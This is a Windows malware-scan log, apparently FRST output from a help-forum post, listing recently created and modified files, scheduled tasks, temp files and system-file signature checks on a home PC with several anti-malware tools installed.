2016-01-04 18:56 - 2016-01-04 18:56 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Emsisoft Anti-Malware
2016-01-04 18:55 - 2015-03-24 00:17 - 00135800 _____ (Emsisoft GmbH) C:\Windows\system32\Drivers\epp64.sys
2016-01-04 18:54 - 2016-01-04 19:59 - 00000000 ____D C:\Program Files (x86)\Emsisoft Anti-Malware
2016-01-04 18:42 - 2016-01-04 18:43 - 159508608 _____ (Emsisoft Ltd. ) C:\Users\Joseph\Downloads\EmsisoftAntiMalwareSetup.exe
2016-01-04 18:06 - 2016-01-04 18:06 - 00000000 ____D C:\Users\Joseph\AppData\Local\GWX
2016-01-04 17:30 - 2016-01-04 17:30 - 00000000 ____D C:\Users\Joseph\AppData\Roaming\Apple Computer
2016-01-04 17:30 - 2016-01-04 17:30 - 00000000 ____D C:\Users\Joseph\AppData\LocalLow\Apple Computer
2016-01-04 17:30 - 2016-01-04 17:30 - 00000000 ____D C:\Users\Joseph\AppData\Local\MediaShow
2016-01-04 17:29 - 2016-01-04 17:30 - 00000000 ____D C:\Users\Joseph\AppData\Roaming\CyberLink
2016-01-04 17:29 - 2016-01-04 17:29 - 00000000 ____D C:\Users\Joseph\Documents\CyberLink
2016-01-04 17:29 - 2016-01-04 17:29 - 00000000 ____D C:\Users\Joseph\AppData\Local\CyberLink
2016-01-04 15:05 - 2016-01-04 15:05 - 00000000 ____D C:\Users\Joseph\AppData\Local\Apple
2016-01-04 12:38 - 2016-01-04 20:08 - 00000000 ___HD C:\OneDriveTemp
2016-01-04 12:38 - 2016-01-04 12:38 - 00000000 ____D C:\Users\Joseph\OneDrive
2016-01-04 12:24 - 2016-01-04 12:24 - 00482240 _____ C:\Windows\system32\FNTCACHE.DAT
2016-01-04 12:22 - 2016-01-04 12:23 - 05762544 _____ (AVAST Software) C:\Users\Joseph\Downloads\avastclear.exe
2016-01-04 12:17 - 2016-01-04 12:17 - 00001717 _____ C:\Users\Joseph\Desktop\Amnesia The Dark Descent.lnk
2016-01-04 12:17 - 2016-01-04 12:17 - 00000000 ___HD C:\Windows\msdownld.tmp
2016-01-04 12:17 - 2016-01-04 12:17 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Amnesia The Dark Descent
2016-01-04 12:10 - 2016-01-04 12:10 - 00000000 ____D C:\Users\Joseph\AppData\Roaming\Macromedia
2016-01-04 12:05 - 2016-01-04 12:05 - 00000000 ____D C:\Users\Joseph\Tracing
2016-01-04 12:03 - 2016-01-04 12:09 - 00000000 ____D C:\Users\Joseph\AppData\Roaming\Skype
2016-01-04 11:27 - 2016-01-04 11:27 - 00000000 ____D C:\Users\Joseph\Documents\My Games
2016-01-04 11:05 - 2016-01-04 11:05 - 00037065 _____ C:\Users\Joseph\Downloads\[kat.cr]mcafee.virusscan.enterprise.8.7i.full.multilanguage.torrent
2016-01-04 10:58 - 2016-01-04 10:58 - 00000000 ____D C:\Users\Joseph\AppData\Roaming\WinRAR
2016-01-04 10:52 - 2016-01-04 17:28 - 00003378 _____ C:\Windows\System32\Tasks\RealDownloaderRealUpgradeScheduledTaskS-1-5-21-1412126346-3748250155-1825200208-1002
2016-01-04 10:52 - 2016-01-04 17:28 - 00003326 _____ C:\Windows\System32\Tasks\RealDownloaderRealUpgradeLogonTaskS-1-5-21-1412126346-3748250155-1825200208-1002
2016-01-04 10:52 - 2016-01-04 10:52 - 00000000 ____D C:\Users\Joseph\AppData\Roaming\RealNetworks
2016-01-04 10:51 - 2016-01-04 10:51 - 00000000 ____D C:\Users\Joseph\AppData\Local\Real
2016-01-04 10:50 - 2016-01-04 11:00 - 00000000 ____D C:\Users\Joseph\AppData\Roaming\Real
2016-01-04 10:50 - 2016-01-04 10:58 - 00000000 ____D C:\Users\Joseph\Downloads\Games
2016-01-04 10:50 - 2016-01-04 10:50 - 00000000 ____D C:\Users\Joseph\AppData\Local\CrashRpt
2016-01-04 10:28 - 2016-01-04 10:58 - 00000000 ____D C:\Users\Joseph\Downloads\Music Downloads, Discos, and Extra
2016-01-04 10:27 - 2016-01-04 10:28 - 00000000 ____D C:\Users\Joseph\Downloads\PC Performers
2016-01-04 10:26 - 2016-01-04 10:28 - 00000000 ____D C:\Users\Joseph\Downloads\Game Downloads
2016-01-04 10:24 - 2016-01-04 10:24 - 00000085 _____ C:\Windows\wininit.ini
2016-01-04 10:19 - 2016-01-04 10:19 - 00000000 ____D C:\Users\Joseph\.oracle_jre_usage
2016-01-04 10:12 - 2016-01-04 20:05 - 00003598 _____ C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-1412126346-3748250155-1825200208-1002
2016-01-04 10:07 - 2016-01-04 10:07 - 00000000 ____D C:\Users\Joseph\AppData\Roaming\AVAST Software
2016-01-04 10:07 - 2016-01-04 10:07 - 00000000 ____D C:\Users\Joseph\AppData\Roaming\Adobe
2016-01-04 10:05 - 2016-01-04 12:31 - 00000000 ____D C:\Users\Joseph\AppData\Local\Packages
2016-01-04 10:04 - 2016-01-04 17:54 - 00000000 ____D C:\Users\Joseph\AppData\Local\Google
2016-01-04 10:04 - 2016-01-04 10:26 - 00000000 __SHD C:\Users\Joseph\IntelGraphicsProfiles
2016-01-04 10:04 - 2016-01-04 10:04 - 00000000 ____D C:\Users\Joseph\AppData\Roaming\Synaptics
2016-01-04 10:04 - 2016-01-04 10:04 - 00000000 ____D C:\Users\Joseph\AppData\Local\VirtualStore
2016-01-04 10:01 - 2016-01-04 12:38 - 00000000 ____D C:\Users\Joseph
2016-01-04 10:01 - 2016-01-04 10:01 - 00000020 ___SH C:\Users\Joseph\ntuser.ini
2016-01-04 10:01 - 2016-01-04 10:01 - 00000000 _SHDL C:\Users\Joseph\My Documents
2016-01-04 10:01 - 2016-01-04 10:01 - 00000000 _SHDL C:\Users\Joseph\Documents\My Videos
2016-01-04 10:01 - 2016-01-04 10:01 - 00000000 _SHDL C:\Users\Joseph\Documents\My Pictures
2016-01-04 10:01 - 2016-01-04 10:01 - 00000000 _SHDL C:\Users\Joseph\Documents\My Music
2016-01-04 10:01 - 2015-07-28 20:49 - 00000551 _____ C:\Users\Joseph\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Documents.lnk
2016-01-04 10:01 - 2015-07-28 20:49 - 00000549 _____ C:\Users\Joseph\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Pictures.lnk
2016-01-04 10:01 - 2014-04-24 20:12 - 00000000 ___HD C:\Users\Joseph\Documents\hp.system.package.metadata
2016-01-04 10:01 - 2014-04-24 20:12 - 00000000 ___HD C:\Users\Joseph\Documents\hp.applications.package.appdata
2016-01-04 09:13 - 2013-08-22 07:25 - 00000824 _____ C:\Windows\system32\Drivers\etc\hosts.20160104-091355.backup
2016-01-04 08:50 - 2016-01-04 12:24 - 00000000 ____D C:\Program Files (x86)\Spybot - Search & Destroy 2
2016-01-04 08:50 - 2016-01-04 10:24 - 00000000 ____D C:\ProgramData\Spybot - Search & Destroy
2016-01-04 08:50 - 2016-01-04 08:50 - 00000000 ____D C:\Windows\System32\Tasks\Safer-Networking
2016-01-04 03:56 - 2016-01-04 03:56 - 00003046 _____ C:\Windows\System32\Tasks\SafeZone scheduled Autoupdate 1451901358
2016-01-04 03:56 - 2016-01-04 03:56 - 00001060 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avast SafeZone Browser.lnk
2016-01-04 03:54 - 2016-01-04 03:54 - 00000000 ____D C:\Windows\System32\Tasks\AVAST Software
2016-01-03 04:27 - 2016-01-04 02:52 - 00000000 ____D C:\Windows\pss
2015-12-30 18:16 - 2015-12-30 18:19 - 00000276 _____ C:\Windows\Tasks\Start PC Reviver with delay for Liljoethemaster@Liljoe3493.job
2015-12-30 18:16 - 2015-12-30 18:16 - 00002624 _____ C:\Windows\System32\Tasks\Start PC Reviver with delay for Liljoethemaster@Liljoe3493
2015-12-30 17:20 - 2015-12-30 17:20 - 00023082 _____ C:\Windows\System32\Tasks\{087E7947-7E7E-0C0F-0D11-7A050B79117A}
2015-12-30 17:15 - 2015-12-30 17:15 - 00023712 _____ (Corporation) C:\Windows\system32\Drivers\sdfhgdf.sys
2015-12-30 04:37 - 2015-12-30 04:39 - 00000000 ____D C:\Windows\system32\config\RRBackups
2015-12-30 01:34 - 2016-01-04 20:00 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinDirStat
2015-12-28 13:52 - 2016-01-04 12:30 - 00000304 _____ C:\Windows\Tasks\Start PC Reviver for Liljoethemaster@Liljoe3493(logon).job
2015-12-28 13:52 - 2015-12-28 13:52 - 00003438 _____ C:\Windows\System32\Tasks\Start PC Reviver Schedule
2015-12-28 13:52 - 2015-12-28 13:52 - 00003370 _____ C:\Windows\System32\Tasks\Start PC Reviver Update
2015-12-28 13:52 - 2015-12-28 13:52 - 00002600 _____ C:\Windows\System32\Tasks\Start PC Reviver for Liljoethemaster@Liljoe3493(logon)
2015-12-27 15:15 - 2016-01-04 13:09 - 00000552 _____ C:\Windows\Tasks\SUPERAntiSpyware Scheduled Task 0e5ae95f-73dd-4db3-b20f-59643e5fb995.job
2015-12-27 15:15 - 2016-01-04 05:09 - 00000552 _____ C:\Windows\Tasks\SUPERAntiSpyware Scheduled Task f4ed902d-2bcc-4077-b392-aaba5eb3e6f7.job
2015-12-27 15:15 - 2016-01-01 22:00 - 00000552 _____ C:\Windows\Tasks\SUPERAntiSpyware Scheduled Task ea76e74c-ab88-4c06-b5b8-3904632bc604.job
2015-12-27 15:15 - 2015-12-27 15:15 - 00003632 _____ C:\Windows\System32\Tasks\SUPERAntiSpyware Scheduled Task f4ed902d-2bcc-4077-b392-aaba5eb3e6f7
2015-12-27 15:15 - 2015-12-27 15:15 - 00003630 _____ C:\Windows\System32\Tasks\SUPERAntiSpyware Scheduled Task ea76e74c-ab88-4c06-b5b8-3904632bc604
2015-12-27 15:15 - 2015-12-27 15:15 - 00003548 _____ C:\Windows\System32\Tasks\SUPERAntiSpyware Scheduled Task 0e5ae95f-73dd-4db3-b20f-59643e5fb995
2015-12-26 04:13 - 2015-11-27 08:46 - 72203792 _____ (Realtek Semiconductor Corp.) C:\Windows\system32\RCoRes64.dat
2015-12-26 04:13 - 2015-11-27 08:46 - 04686592 _____ (Realtek Semiconductor Corp.) C:\Windows\system32\Drivers\RTKVHD64.sys
2015-12-26 04:13 - 2015-11-27 08:46 - 04307112 _____ C:\Windows\system32\Drivers\RTAIODAT.DAT
2015-12-26 04:13 - 2015-11-27 08:46 - 03271912 _____ (Realtek Semiconductor Corp.) C:\Windows\system32\RtkApi64.dll
2015-12-26 04:13 - 2015-11-27 08:46 - 03195648 _____ (Realtek Semiconductor Corp.) C:\Windows\system32\RtPgEx64.dll
2015-12-26 04:13 - 2015-11-27 08:46 - 03040488 _____ (Realtek Semiconductor Corp.) C:\Windows\system32\RltkAPO64.dll
2015-12-26 04:13 - 2015-11-27 08:46 - 02893568 _____ (Realtek Semiconductor Corp.) C:\Windows\system32\RTSnMg64.cpl
2015-12-26 04:13 - 2015-11-27 08:46 - 02130584 _____ (DTS, Inc.) C:\Windows\system32\sltech64.dll
2015-12-26 04:13 - 2015-11-27 08:46 - 02030208 _____ (Realtek Semiconductor Corp.) C:\Windows\system32\RCoInstII64.dll
2015-12-26 04:13 - 2015-11-27 08:46 - 01601952 _____ (Conexant Systems Inc.) C:\Windows\system32\CX64APO.dll
2015-12-26 04:13 - 2015-11-27 08:46 - 01435144 _____ (Synopsys, Inc.) C:\Windows\system32\SRRPTR64.dll
2015-12-26 04:13 - 2015-11-27 08:46 - 01356512 _____ (Realtek Semiconductor Corp.) C:\Windows\system32\RTCOM64.dll
2015-12-26 04:13 - 2015-11-27 08:46 - 01328496 _____ (DTS, Inc.) C:\Windows\system32\slcnt64.dll
2015-12-26 04:13 - 2015-11-27 08:46 - 01020208 _____ (DTS, Inc.) C:\Windows\system32\sl3apo64.dll
2015-12-26 04:13 - 2015-11-27 08:46 - 00689888 _____ (Realtek Semiconductor Corp.) C:\Windows\system32\RtDataProc64.dll
2015-12-26 04:13 - 2015-11-27 08:46 - 00574760 _____ (Andrea Electronics Corporation) C:\Windows\system32\AERTAC64.dll
2015-12-26 04:13 - 2015-11-27 08:46 - 00532384 _____ (SRS Labs, Inc.) C:\Windows\system32\SRSTSX64.dll
2015-12-26 04:13 - 2015-11-27 08:46 - 00467168 _____ (Synopsys, Inc.) C:\Windows\system32\SRAPO64.dll
2015-12-26 04:13 - 2015-11-27 08:46 - 00387320 _____ (Dolby Laboratories, Inc.) C:\Windows\system32\RTEEP64A.dll
2015-12-26 04:13 - 2015-11-27 08:46 - 00381416 _____ (Synopsys, Inc.) C:\Windows\system32\SRCOM64.dll
2015-12-26 04:13 - 2015-11-27 08:46 - 00343712 _____ (Realtek Semiconductor Corp.) C:\Windows\system32\RtlCPAPI64.dll
2015-12-26 04:13 - 2015-11-27 08:46 - 00341160 _____ (Synopsys, Inc.) C:\Windows\system32\SRCOM.dll
2015-12-26 04:13 - 2015-11-27 08:46 - 00321720 _____ (Dolby Laboratories, Inc.) C:\Windows\system32\RP3DHT64.dll
2015-12-26 04:13 - 2015-11-27 08:46 - 00321720 _____ (Dolby Laboratories, Inc.) C:\Windows\system32\RP3DAA64.dll
2015-12-26 04:13 - 2015-11-27 08:46 - 00258504 _____ (TODO: <Company name>) C:\Windows\system32\slprp64.dll
2015-12-26 04:13 - 2015-11-27 08:46 - 00214840 _____ (Dolby Laboratories, Inc.) C:\Windows\system32\RTEED64A.dll
2015-12-26 04:13 - 2015-11-27 08:46 - 00192984 _____ (Realtek Semiconductor Corp.) C:\Windows\system32\RtkCfg64.dll
2015-12-26 04:13 - 2015-11-27 08:46 - 00166208 _____ (SRS Labs, Inc.) C:\Windows\system32\SRSWOW64.dll
2015-12-26 04:13 - 2015-11-27 08:46 - 00122320 _____ (Real Sound Lab SIA) C:\Windows\system32\CONEQMSAPOGUILibrary.dll
2015-12-26 04:13 - 2015-11-27 08:46 - 00118600 _____ (Andrea Electronics Corporation) C:\Windows\system32\AERTAR64.dll
2015-12-26 04:13 - 2015-11-27 08:46 - 00110992 _____ (Dolby Laboratories, Inc.) C:\Windows\system32\RTEEL64A.dll
2015-12-26 04:13 - 2015-11-27 08:46 - 00088352 _____ (Dolby Laboratories, Inc.) C:\Windows\system32\RTEEG64A.dll
2015-12-26 04:13 - 2015-11-27 08:46 - 00023704 _____ (Realtek Semiconductor Corp.) C:\Windows\system32\RtkCoLDR64.dll
2015-12-24 18:59 - 2016-01-04 02:53 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
2015-12-21 04:44 - 2015-12-21 04:44 - 00000000 ____D C:\Program Files\GTA V
2015-12-19 10:58 - 2015-12-19 10:58 - 00000000 ____D C:\Program Files (x86)\HP
2015-12-11 21:45 - 2016-01-04 02:53 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2015-12-11 21:45 - 2015-12-30 18:16 - 00001772 _____ C:\Users\Public\Desktop\iTunes.lnk
2015-12-11 21:44 - 2015-12-11 21:45 - 00000000 ____D C:\Program Files\iTunes
2015-12-11 21:44 - 2015-12-11 21:44 - 00000000 ____D C:\Program Files\iPod
2015-12-11 21:44 - 2015-12-11 21:44 - 00000000 ____D C:\Program Files (x86)\iTunes
2015-12-08 20:49 - 2015-12-08 20:49 - 00002760 _____ C:\Windows\System32\Tasks\AVGPCTuneUp_Task_BkGndMaintenance
2015-12-07 20:47 - 2015-12-07 20:47 - 00002762 _____ C:\Windows\System32\Tasks\TuneUpUtilities_Task_BkGndMaintenance2013
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-01-04 20:59 - 2015-10-25 23:46 - 00000938 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2016-01-04 20:57 - 2015-01-29 20:29 - 00000960 _____ C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1412126346-3748250155-1825200208-1001UA.job
2016-01-04 20:56 - 2013-08-22 07:36 - 00000000 ____D C:\Windows
2016-01-04 20:08 - 2014-03-31 19:07 - 00000000 ___HD C:\SYSTEM.SAV
2016-01-04 20:00 - 2015-11-30 07:14 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-01-04 18:58 - 2015-10-25 23:46 - 00000934 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2016-01-04 13:57 - 2015-01-29 20:29 - 00000908 _____ C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1412126346-3748250155-1825200208-1001Core.job
2016-01-04 12:36 - 2013-08-22 09:36 - 00000000 ____D C:\Windows\AppReadiness
2016-01-04 12:27 - 2013-08-22 08:45 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2016-01-04 12:26 - 2013-08-22 07:25 - 00262144 ___SH C:\Windows\system32\config\BBI
2016-01-04 12:17 - 2015-01-14 08:43 - 00000000 ____D C:\Windows\SysWOW64\directx
2016-01-04 12:10 - 2015-08-02 12:48 - 00000000 ____D C:\Games
2016-01-04 12:09 - 2014-03-18 03:53 - 00956476 _____ C:\Windows\system32\PerfStringBackup.INI
2016-01-04 12:09 - 2013-08-22 07:36 - 00000000 ____D C:\Windows\Inf
2016-01-04 10:19 - 2015-09-11 03:49 - 00000000 ____D C:\Program Files (x86)\Bruteforce Save Data
2016-01-04 10:16 - 2014-12-16 20:46 - 00000000 ___HD C:\Users\Liljoe3493
2016-01-04 10:15 - 2013-08-22 09:36 - 00000000 ___HD C:\Program Files\WindowsApps
2016-01-04 10:07 - 2014-12-16 20:47 - 00000000 ____D C:\Windows\System32\Tasks\WPD
2016-01-04 09:01 - 2014-12-16 20:52 - 00003598 _____ C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-1412126346-3748250155-1825200208-1001
2016-01-04 08:53 - 2015-07-30 11:49 - 00000000 ____D C:\Program Files\Common Files\AV
2016-01-04 07:10 - 2015-11-20 03:35 - 00192216 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2016-01-04 06:08 - 2013-08-22 09:20 - 00000000 ____D C:\Windows\CbsTemp
2016-01-04 03:23 - 2015-01-29 18:44 - 00000000 ____D C:\Program Files (x86)\SplitmediaLabs
2016-01-04 03:22 - 2015-01-29 18:44 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\XSplit
2016-01-04 02:54 - 2015-04-04 17:37 - 00000000 ___SD C:\Windows\SysWOW64\GWX
2016-01-04 02:54 - 2015-04-04 17:37 - 00000000 ___SD C:\Windows\system32\GWX
2016-01-04 02:54 - 2013-08-22 09:36 - 00000000 __RSD C:\Windows\Media
2016-01-04 02:54 - 2013-08-22 09:36 - 00000000 ____D C:\Windows\PolicyDefinitions
2016-01-04 02:54 - 2013-08-22 07:36 - 00000000 ____D C:\Windows\system32\Sysprep
2016-01-04 02:54 - 2013-08-22 07:36 - 00000000 ____D C:\Windows\servicing
2016-01-04 02:53 - 2015-11-20 03:38 - 00000000 ____D C:\Program Files\SUPERAntiSpyware
2016-01-04 02:53 - 2015-11-20 03:34 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2016-01-04 02:53 - 2015-11-20 03:21 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
2016-01-04 02:53 - 2015-10-29 19:06 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SOMA [GOG.com]
2016-01-04 02:53 - 2015-10-29 18:10 - 00000000 ____D C:\GOG Games
2016-01-04 02:53 - 2015-10-26 00:48 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome
2016-01-04 02:53 - 2015-08-30 04:59 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\RealNetworks
2016-01-04 02:53 - 2015-08-26 18:12 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Outlast
2016-01-04 02:53 - 2015-08-17 15:50 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\QuickTime
2016-01-04 02:53 - 2015-08-06 02:31 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Amnesia - The Dark Descent
2016-01-04 02:53 - 2015-08-04 19:30 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Mouse and Keyboard Center
2016-01-04 02:53 - 2015-07-18 15:49 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\BlueStacks
2016-01-04 02:53 - 2015-07-07 17:30 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Bruteforce Save Data
2016-01-04 02:53 - 2015-05-31 09:24 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Ashampoo
2016-01-04 02:53 - 2014-12-26 18:00 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Elgato
2016-01-04 02:53 - 2014-12-23 13:53 - 00000000 ____D C:\ProgramData\NexonUS
2016-01-04 02:53 - 2014-12-20 15:35 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2016-01-04 02:53 - 2014-12-19 16:03 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR
2016-01-04 02:53 - 2014-11-04 06:50 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HP
2016-01-04 02:53 - 2014-11-04 06:32 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Music, Photos and Videos
2016-01-04 02:53 - 2014-04-24 20:37 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2016-01-04 02:53 - 2014-04-24 20:27 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HP Help and Support
2016-01-04 02:53 - 2014-04-24 20:18 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Communication and Chat
2016-01-04 02:53 - 2014-04-24 20:16 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Security and Protection
2016-01-04 02:53 - 2014-04-24 20:15 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Productivity and Tools
2016-01-04 02:53 - 2013-08-22 09:36 - 00000000 ____D C:\Program Files\Common Files\microsoft shared
2016-01-04 02:34 - 2013-08-22 09:36 - 00000000 ____D C:\Windows\registration
2016-01-04 02:32 - 2013-08-22 09:36 - 00000000 ____D C:\Windows\FileManager
2016-01-04 02:32 - 2013-08-22 09:36 - 00000000 ____D C:\Windows\Camera
2016-01-04 02:30 - 2015-08-30 04:55 - 00000000 ____D C:\ProgramData\Real
2016-01-04 02:29 - 2014-03-18 03:38 - 00000000 ____D C:\Program Files\Windows Journal
2016-01-04 02:29 - 2013-08-22 09:36 - 00000000 ____D C:\Program Files\Windows NT
2016-01-03 02:15 - 2014-12-23 16:45 - 00000000 ____D C:\Windows\system32\MRT
2016-01-02 22:36 - 2014-04-02 04:25 - 00000000 ____D C:\Windows\Panther
2016-01-02 11:34 - 2014-12-16 21:45 - 00003974 _____ C:\Windows\System32\Tasks\User_Feed_Synchronization-{C5342454-CD0C-4E31-9608-FCC9E4173C6D}
2015-12-30 18:17 - 2015-10-22 16:11 - 00001044 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2015-12-30 18:17 - 2015-09-10 05:01 - 00001201 _____ C:\Users\Public\Desktop\XSplit Gamecaster.lnk
2015-12-30 18:17 - 2015-01-29 20:53 - 00002535 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Apple Software Update.lnk
2015-12-30 18:17 - 2014-12-19 16:03 - 00000994 _____ C:\ProgramData\Microsoft\Windows\Start Menu\WinRAR.lnk
2015-12-30 18:17 - 2014-04-24 20:23 - 00001390 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Photo Gallery.lnk
2015-12-30 18:17 - 2014-04-24 20:23 - 00001321 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Movie Maker.lnk
2015-12-30 18:17 - 2014-03-18 03:55 - 00002542 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FileManager.lnk
2015-12-30 18:17 - 2013-09-30 16:49 - 00001602 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HP Control Zone (Touchpad Clickpad Trackpad Mouse).lnk
2015-12-30 18:17 - 2013-08-22 00:57 - 00002463 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PhotosApp.lnk
2015-12-30 18:17 - 2013-08-22 00:57 - 00002213 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Camera.lnk
2015-12-30 18:16 - 2015-11-29 17:25 - 00000970 _____ C:\Users\Public\Desktop\RealPlayer (RealTimes).lnk
2015-12-30 18:16 - 2015-11-20 03:34 - 00001085 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2015-12-30 18:16 - 2015-10-29 19:06 - 00001579 _____ C:\Users\Public\Desktop\SOMA.lnk
2015-12-30 18:16 - 2015-10-26 00:48 - 00001277 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2015-12-30 18:16 - 2015-10-22 16:11 - 00001032 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
2015-12-30 18:16 - 2015-08-26 18:12 - 00000722 _____ C:\Users\Public\Desktop\Outlast.lnk
2015-12-30 18:16 - 2015-07-18 15:49 - 00001843 _____ C:\Users\Public\Desktop\Apps.lnk
2015-12-30 18:16 - 2015-05-31 09:24 - 00001213 _____ C:\Users\Public\Desktop\Ashampoo WinOptimizer 11.lnk
2015-12-30 18:16 - 2014-12-26 18:00 - 00001117 _____ C:\Users\Public\Desktop\Game Capture HD.lnk
2015-12-30 18:16 - 2014-12-19 16:10 - 00000885 _____ C:\Users\Public\Desktop\CCleaner.lnk
2015-12-30 18:01 - 2014-11-04 06:28 - 00000000 ____D C:\Windows\Hewlett-Packard
2015-12-28 17:25 - 2014-12-20 15:34 - 00000000 ____D C:\ProgramData\Oracle
2015-12-28 17:20 - 2014-12-20 15:34 - 00000000 ____D C:\Program Files (x86)\Java
2015-12-28 17:17 - 2014-12-20 15:35 - 00097888 _____ (Oracle Corporation) C:\Windows\SysWOW64\WindowsAccessBridge-32.dll
2015-12-28 17:16 - 2015-07-30 11:46 - 00000000 ____D C:\Program Files (x86)\AVG
2015-12-28 15:32 - 2014-11-04 06:31 - 00000000 ____D C:\Windows\SysWOW64\RTCOM
2015-12-27 18:02 - 2014-12-19 16:10 - 00002782 _____ C:\Windows\System32\Tasks\CCleanerSkipUAC
2015-12-27 17:56 - 2015-11-29 18:56 - 00003450 _____ C:\Windows\System32\Tasks\RealDownloader Update Check
2015-12-27 17:56 - 2015-11-29 17:25 - 00003388 _____ C:\Windows\System32\Tasks\RealDownloaderRealUpgradeScheduledTaskS-1-5-21-1412126346-3748250155-1825200208-1001
2015-12-27 17:56 - 2015-11-29 17:25 - 00003338 _____ C:\Windows\System32\Tasks\RealDownloaderRealUpgradeLogonTaskS-1-5-21-1412126346-3748250155-1825200208-1001
2015-12-24 18:59 - 2014-12-19 15:39 - 00000000 ___RD C:\Program Files (x86)\Skype
2015-12-24 18:59 - 2014-12-19 15:39 - 00000000 ____D C:\ProgramData\Skype
2015-12-20 19:11 - 2015-11-20 17:10 - 00003208 _____ C:\Windows\System32\Tasks\HPCeeScheduleForLiljoe3493
2015-12-20 19:11 - 2015-11-20 17:10 - 00000384 _____ C:\Windows\Tasks\HPCeeScheduleForLiljoe3493.job
2015-12-19 10:58 - 2015-11-29 19:49 - 00000000 ____D C:\swsetup
2015-12-15 17:42 - 2015-06-18 16:42 - 00003232 _____ C:\Windows\System32\Tasks\HPCeeScheduleForLILJOETHEMASTER$
2015-12-15 17:42 - 2015-06-18 16:42 - 00000396 _____ C:\Windows\Tasks\HPCeeScheduleForLILJOETHEMASTER$.job
2015-12-14 08:22 - 2015-07-06 16:27 - 00003120 _____ C:\Windows\System32\Tasks\Microsoft OneDrive Auto Update Task-S-1-5-21-1412126346-3748250155-1825200208-1001
2015-12-11 21:44 - 2015-01-29 20:52 - 00000000 ____D C:\Program Files\Common Files\Apple
2015-12-06 18:45 - 2014-12-19 18:12 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2015-12-06 14:26 - 2014-11-04 06:39 - 00000000 ____D C:\ProgramData\Temp
 
Some files in TEMP:
====================
C:\Users\Joseph\AppData\Local\Temp\COMAP.EXE
C:\Users\Joseph\AppData\Local\Temp\mpam-df95902f.exe
C:\Users\Joseph\AppData\Local\Temp\oi_{65F941F6-5425-4720-96B6-98DBF87CA402}.exe
 
 
==================== Bamital & volsnap =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
 
 
